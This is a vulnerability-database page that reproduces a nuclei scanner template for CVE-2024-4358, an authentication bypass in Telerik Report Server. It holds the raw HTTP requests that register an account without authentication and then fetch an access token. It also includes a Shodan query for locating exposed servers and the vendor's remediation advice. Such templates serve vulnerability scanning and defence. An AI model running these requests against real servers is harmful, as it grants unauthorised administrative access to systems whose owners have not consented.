Lucene search
K

Progress Telerik Report Server - Authentication Bypass

🗓️ 28 Jun 2026 15:08:32Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 44 Views

Progress Telerik Report Server authentication bypass on IIS version 2024 Q1 (10.0.24.305) or earlie

Related
Refs
Code
id: CVE-2024-4358

info:
  name: Progress Telerik Report Server - Authentication Bypass
  author: DhiyaneshDK
  severity: critical
  description: |
    In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.
  impact: An unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.
  remediation: Updating to Report Server 2024 Q2 (10.1.24.514) or later.
  reference:
    - https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/
    - https://github.com/sinsinology/CVE-2024-4358
    - https://docs.telerik.com/report-server/knowledge-base/registration-auth-bypass-cve-2024-4358
  classification:
    epss-score: 0.97482
    epss-percentile: 0.99892
    cpe: cpe:2.3:a:progress:telerik_report_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    shodan-query: title:"Log in | Telerik Report Server"
    product: telerik_report_server
    vendor: progress
  tags: cve,cve2024,telerik,progress,auth-bypass,instrusive,kev,vkev,vuln
variables:
  user: "{{rand_base(6)}}"
  pass: "{{rand_base(8)}}"
  email: "{{randstr}}@{{rand_base(5)}}.com"
  firstname: "{{rand_base(5)}}"
  lastname: "{{rand_base(5)}}"

http:
  - raw:
      - |
        POST /Startup/Register HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        Username={{user}}&Password={{pass}}&ConfirmPassword={{pass}}&Email={{email}}&FirstName={{firstname}}&LastName={{lastname}}

      - |
        POST /Token HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        grant_type=password&username={{user}}&password={{pass}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type_2, "application/json")'
          - 'contains_all(body_2, "access_token", "userName", "token_type")'
          - 'status_code_2 == 200'
        condition: and

    extractors:
      - type: regex
        name: token
        part: body_2
        group: 1
        regex:
          - '"access_token":"([A-Z0-9a-z_-]+)"'
        internal: true

      - type: dsl
        dsl:
          - '"Username: "+ user'
          - '"Password: "+ pass'
# digest: 490a00463044022034340e6059231d4dec4294216f07e5bac711758706a71191d1b89348aff21b3a022067c1e310bb5d582bc4a5a431bc469b49b3765dbf73227d4d017b636b59182bea:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.6High risk
Vulners AI Score7.6
CVSS 3.19.8 - 9.9
EPSS0.97482
SSVC
44